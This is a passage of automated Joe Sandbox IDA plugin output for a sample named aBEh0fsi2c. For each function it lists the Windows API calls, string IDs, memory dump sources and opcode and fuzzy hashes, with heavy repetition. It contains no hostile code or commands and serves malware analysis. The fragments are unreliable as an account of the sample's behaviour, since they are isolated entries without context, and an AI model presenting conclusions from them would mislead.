                                                          • Associated: 00000000.00000002.1336849316.00000000003EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1336849316.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1336999850.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1337053292.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_360000_aBEh0fsi2c.jbxd
                                                          Similarity
                                                          • API ID: LengthMessageSendTextWindow
                                                          • String ID: edit
                                                          • API String ID: 2978978980-2167791130
                                                          • Opcode ID: 5e2359e1e3feebeb0cc03d77cd57388059756d9e186da786225b3b53651ac82b
                                                          • Instruction ID: 884fa5feeca3d85b95f0d4340e9ca3925afa5571bff329821de2bc8604323d77
                                                          • Opcode Fuzzy Hash: 5e2359e1e3feebeb0cc03d77cd57388059756d9e186da786225b3b53651ac82b
                                                          • Instruction Fuzzy Hash: C4119D711001A8AFEB128E659C82AEB3669EB663B4F514724F9A0961E1C771DC509760
                                                          APIs
                                                          • _memset.LIBCMT ref: 003C2A22
                                                          • GetMenuItemInfoW.USER32(00000030,?,00000000,00000030), ref: 003C2A41
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1336771467.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                          • Associated: 00000000.00000002.1336758325.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1336849316.00000000003EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1336849316.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1336999850.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1337053292.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_360000_aBEh0fsi2c.jbxd
                                                          Similarity
                                                          • API ID: InfoItemMenu_memset
                                                          • String ID: 0
                                                          • API String ID: 2223754486-4108050209
                                                          • Opcode ID: fe494ac76d96a9122054999614a50f869d0aaecd0292aa2cda02cc6f046d931a
                                                          • Instruction ID: ea24e4fb2844b129b8fd696d0a2a66eb74d6ee09d0b44da3a2046affcaa0de06
                                                          • Opcode Fuzzy Hash: fe494ac76d96a9122054999614a50f869d0aaecd0292aa2cda02cc6f046d931a
                                                          • Instruction Fuzzy Hash: 9411083AA01518AFCF32EB98DC44FAB77BCAB45300F064039E855E7290DB70AD0AC795
                                                          APIs
                                                          • InternetOpenW.WININET(?,00000000,00000000,00000000,00000000), ref: 003D222C
                                                          • InternetSetOptionW.WININET(00000000,00000032,?,00000008), ref: 003D2255
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1336771467.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                          • Associated: 00000000.00000002.1336758325.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1336849316.00000000003EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1336849316.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1336999850.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1337053292.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_360000_aBEh0fsi2c.jbxd
                                                          Similarity
                                                          • API ID: Internet$OpenOption
                                                          • String ID: <local>
                                                          • API String ID: 942729171-4266983199
                                                          • Opcode ID: ea5e95168a905da0ecde5c27664e7631a742d01d901c1cc0be4f9f5a79c44126
                                                          • Instruction ID: 4e8edb08eac8f48308ed58d8fc80a5c3e822c14eeeac6c55d6957a850b0d9896
                                                          • Opcode Fuzzy Hash: ea5e95168a905da0ecde5c27664e7631a742d01d901c1cc0be4f9f5a79c44126
                                                          • Instruction Fuzzy Hash: D2110272501265BEDB268F11AC84EFBFBACFF26351F10862BF90446640D2705990D6F0
                                                          APIs
                                                          • GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,00363C14,004252F8,?,?,?), ref: 0037096E
                                                            • Part of subcall function 00367BCC: _memmove.LIBCMT ref: 00367C06
                                                          • _wcscat.LIBCMT ref: 003A4CB7
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1336771467.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                          • Associated: 00000000.00000002.1336758325.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1336849316.00000000003EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1336849316.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1336999850.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1337053292.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_360000_aBEh0fsi2c.jbxd
                                                          Similarity
                                                          • API ID: FullNamePath_memmove_wcscat
                                                          • String ID: SB
                                                          • API String ID: 257928180-3983915703
                                                          • Opcode ID: 005c0801b90214b17c6f4fcf6b31d508b9887dfc7c8d11d95a45e29dc3445357
                                                          • Instruction ID: 7315992da958bb8e8b16e9d4d4ab1a3c23a9ff7fea0552b4385f18796465ee5e
                                                          • Opcode Fuzzy Hash: 005c0801b90214b17c6f4fcf6b31d508b9887dfc7c8d11d95a45e29dc3445357
                                                          • Instruction Fuzzy Hash: 4B11E531A052189ACB12FB74C802EDE73F8EF09350B40C5A6BA48DB195EBB496844B14
                                                          APIs
                                                            • Part of subcall function 00367DE1: _memmove.LIBCMT ref: 00367E22
                                                            • Part of subcall function 003BAA99: GetClassNameW.USER32(?,?,000000FF), ref: 003BAABC
                                                          • SendMessageW.USER32(?,000001A2,000000FF,?), ref: 003B8E73
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1336771467.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                          • Associated: 00000000.00000002.1336758325.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1336849316.00000000003EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1336849316.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1336999850.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1337053292.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_360000_aBEh0fsi2c.jbxd
                                                          Similarity
                                                          • API ID: ClassMessageNameSend_memmove
                                                          • String ID: ComboBox$ListBox
                                                          • API String ID: 372448540-1403004172
                                                          • Opcode ID: 13eb8e29695fafbea7c5658c848325e15219b115143d83bf2c2b05e416cabf05
                                                          • Instruction ID: 2d31360ddf744b3652359c522eb3927acec43800e94aa0da7ec39f1eae7cd56a
                                                          • Opcode Fuzzy Hash: 13eb8e29695fafbea7c5658c848325e15219b115143d83bf2c2b05e416cabf05
                                                          • Instruction Fuzzy Hash: 24012471605228ABCB16FBA4CC819FE736CEF01320B104A19F9715B6E1DF319808C660
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1336771467.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                          • Associated: 00000000.00000002.1336758325.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1336849316.00000000003EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1336849316.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1336999850.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1337053292.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_360000_aBEh0fsi2c.jbxd
                                                          Similarity
                                                          • API ID: __fread_nolock_memmove
                                                          • String ID: EA06
                                                          • API String ID: 1988441806-3962188686
                                                          • Opcode ID: dcd3b740a341242427aee971d1e09c81ee0a99b04a82370942c8bc085f18f4ca
                                                          • Instruction ID: 61caae64fed9a80aa9d7746dabc1d65c8d17ec58b317635cd1ea23610cd3bb36
                                                          • Opcode Fuzzy Hash: dcd3b740a341242427aee971d1e09c81ee0a99b04a82370942c8bc085f18f4ca
                                                          • Instruction Fuzzy Hash: DF01D6718046186EDB19DBA8C816EEABBF89B11301F00459EF553D6181E974AA088760
                                                          APIs
                                                            • Part of subcall function 00367DE1: _memmove.LIBCMT ref: 00367E22
                                                            • Part of subcall function 003BAA99: GetClassNameW.USER32(?,?,000000FF), ref: 003BAABC
                                                          • SendMessageW.USER32(?,00000180,00000000,?), ref: 003B8D6B
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1336771467.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                          • Associated: 00000000.00000002.1336758325.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1336849316.00000000003EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1336849316.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1336999850.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1337053292.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_360000_aBEh0fsi2c.jbxd
                                                          Similarity
                                                          • API ID: ClassMessageNameSend_memmove
                                                          • String ID: ComboBox$ListBox
                                                          • API String ID: 372448540-1403004172
                                                          • Opcode ID: 6d94b374fa2f0abdf54fdee40bc6de289b0996ee530022838485d6ead604c5dc
                                                          • Instruction ID: 653a26673d7c33c44e57d93521ded935adaa0aa98d9e35969caf601c69d6833d
                                                          • Opcode Fuzzy Hash: 6d94b374fa2f0abdf54fdee40bc6de289b0996ee530022838485d6ead604c5dc
                                                          • Instruction Fuzzy Hash: 5501F271B41508ABCB17EBA0C992EFE73ACDF15300F10002EB9026B6E1DE249E08D671
                                                          APIs
                                                            • Part of subcall function 00367DE1: _memmove.LIBCMT ref: 00367E22
                                                            • Part of subcall function 003BAA99: GetClassNameW.USER32(?,?,000000FF), ref: 003BAABC
                                                          • SendMessageW.USER32(?,00000182,?,00000000), ref: 003B8DEE
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1336771467.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                          • Associated: 00000000.00000002.1336758325.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1336849316.00000000003EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1336849316.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1336999850.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1337053292.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_360000_aBEh0fsi2c.jbxd
                                                          Similarity
                                                          • API ID: ClassMessageNameSend_memmove
                                                          • String ID: ComboBox$ListBox
                                                          • API String ID: 372448540-1403004172
                                                          • Opcode ID: cdf6132a38119be29a2e965d6b74dff76efc82b02635fedade89a1ec2312b9da
                                                          • Instruction ID: 5134c1d01654e9e8e230317003c9b26551574df0972275876a3701a343945761
                                                          • Opcode Fuzzy Hash: cdf6132a38119be29a2e965d6b74dff76efc82b02635fedade89a1ec2312b9da
                                                          • Instruction Fuzzy Hash: E3012671B45108BBCF13EBA4C992EFE73ACCF21304F10402AB901AB6D2DE258E08D671
                                                          APIs
                                                          • VariantInit.OLEAUT32(?), ref: 003BC534
                                                            • Part of subcall function 003BC816: _memmove.LIBCMT ref: 003BC860
                                                            • Part of subcall function 003BC816: VariantInit.OLEAUT32(00000000), ref: 003BC882
                                                            • Part of subcall function 003BC816: VariantCopy.OLEAUT32(00000000,?), ref: 003BC88C
                                                          • VariantClear.OLEAUT32(?), ref: 003BC556
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1336771467.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                          • Associated: 00000000.00000002.1336758325.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1336849316.00000000003EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1336849316.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1336999850.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1337053292.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_360000_aBEh0fsi2c.jbxd
                                                          Similarity
                                                          • API ID: Variant$Init$ClearCopy_memmove
                                                          • String ID: d}A
                                                          • API String ID: 2932060187-735431763
                                                          • Opcode ID: 353175da059a3566167b33c11df88f4dff068dc0551ce9d0e6922e69ef1a3fc8
                                                          • Instruction ID: 189d5d19045e8fbaf5d52fc7a489cccaaccc922b93c03619368bf55e9d55031b
                                                          • Opcode Fuzzy Hash: 353175da059a3566167b33c11df88f4dff068dc0551ce9d0e6922e69ef1a3fc8
                                                          • Instruction Fuzzy Hash: 7111FAB19007089FC721DFAAD8C49DAB7F8FB08314B50862FE58AD7651E771AA44CF90
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1336771467.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                          • Associated: 00000000.00000002.1336758325.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1336849316.00000000003EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1336849316.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1336999850.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1337053292.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_360000_aBEh0fsi2c.jbxd
                                                          Similarity
                                                          • API ID: ClassName_wcscmp
                                                          • String ID: #32770
                                                          • API String ID: 2292705959-463685578
                                                          • Opcode ID: 60ce87ff259e2b3178113e6f6eb6e51d10f75e181b5d46c18476902616482991
                                                          • Instruction ID: 96837803a5a51cfffb10cb8debc2d8c2558013f16f3f7af9938bd93dd1e236fa
                                                          • Opcode Fuzzy Hash: 60ce87ff259e2b3178113e6f6eb6e51d10f75e181b5d46c18476902616482991
                                                          • Instruction Fuzzy Hash: 62E092326002282AD720AA99AC49FE7FBACEB45B60F01016BFD04D7151D9709B458BE4
                                                          APIs
                                                            • Part of subcall function 0039B314: _memset.LIBCMT ref: 0039B321
                                                            • Part of subcall function 00380940: InitializeCriticalSectionAndSpinCount.KERNEL32(?,00000000,?,0039B2F0,?,?,?,0036100A), ref: 00380945
                                                          • IsDebuggerPresent.KERNEL32(?,?,?,0036100A), ref: 0039B2F4
                                                          • OutputDebugStringW.KERNEL32(ERROR : Unable to initialize critical section in CAtlBaseModule,?,?,?,0036100A), ref: 0039B303
                                                          Strings
                                                          • ERROR : Unable to initialize critical section in CAtlBaseModule, xrefs: 0039B2FE
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1336771467.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                          • Associated: 00000000.00000002.1336758325.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1336849316.00000000003EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1336849316.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1336999850.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1337053292.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_360000_aBEh0fsi2c.jbxd
                                                          Similarity
                                                          • API ID: CountCriticalDebugDebuggerInitializeOutputPresentSectionSpinString_memset
                                                          • String ID: ERROR : Unable to initialize critical section in CAtlBaseModule
                                                          • API String ID: 3158253471-631824599
                                                          • Opcode ID: 8d85533ed8d975ae662a2afd674d57d8e7904306660bb327c6e864706f990115
                                                          • Instruction ID: d35f21fa7d16cdec57c69859374dd6cafb3434ad6ed6fda06f299a5aa10b4d72
                                                          • Opcode Fuzzy Hash: 8d85533ed8d975ae662a2afd674d57d8e7904306660bb327c6e864706f990115
                                                          • Instruction Fuzzy Hash: 8AE06D782007408FDB32DF28E648342BAE8AF00704F008A7DE496CB2D0E7F4E408CBA1
                                                          APIs
                                                          • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 003E596E
                                                          • PostMessageW.USER32(00000000,00000111,00000197,00000000), ref: 003E5981
                                                            • Part of subcall function 003C5244: Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 003C52BC
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1336771467.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                          • Associated: 00000000.00000002.1336758325.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1336849316.00000000003EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1336849316.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1336999850.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1337053292.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_360000_aBEh0fsi2c.jbxd
                                                          Similarity
                                                          • API ID: FindMessagePostSleepWindow
                                                          • String ID: Shell_TrayWnd
                                                          • API String ID: 529655941-2988720461
                                                          • Opcode ID: b6e4dedabe1020cd57273653b776672bf31bde4c5a96328eed82b36d0965e62a
                                                          • Instruction ID: ce929a98e844ed08f54984c0c7fe34e9c490117d6fde123694fd66adeb71f74b
                                                          • Opcode Fuzzy Hash: b6e4dedabe1020cd57273653b776672bf31bde4c5a96328eed82b36d0965e62a
                                                          • Instruction Fuzzy Hash: 7ED0C931384351BBE675AB709C8BFD66A59AB50B55F100929B249AE1D0CAE4A840C658
                                                          APIs
                                                          • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 003E59AE
                                                          • PostMessageW.USER32(00000000), ref: 003E59B5
                                                            • Part of subcall function 003C5244: Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 003C52BC
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1336771467.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                          • Associated: 00000000.00000002.1336758325.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1336849316.00000000003EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1336849316.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1336999850.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1337053292.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_360000_aBEh0fsi2c.jbxd
                                                          Similarity
                                                          • API ID: FindMessagePostSleepWindow
                                                          • String ID: Shell_TrayWnd
                                                          • API String ID: 529655941-2988720461
                                                          • Opcode ID: 366c5114612f7ec8b428676750c5aa941f7f43ae8865bbf0661fa42eff87e07c
                                                          • Instruction ID: 84e231b2c468f738997c523c5ae52bbac75b81aaf2d1763aea9cd3865517e98f
                                                          • Opcode Fuzzy Hash: 366c5114612f7ec8b428676750c5aa941f7f43ae8865bbf0661fa42eff87e07c
                                                          • Instruction Fuzzy Hash: B5D0A9313803007BE675AB309C8BFC26A18AB40B00F000829B205EE1D0CAE0A800C658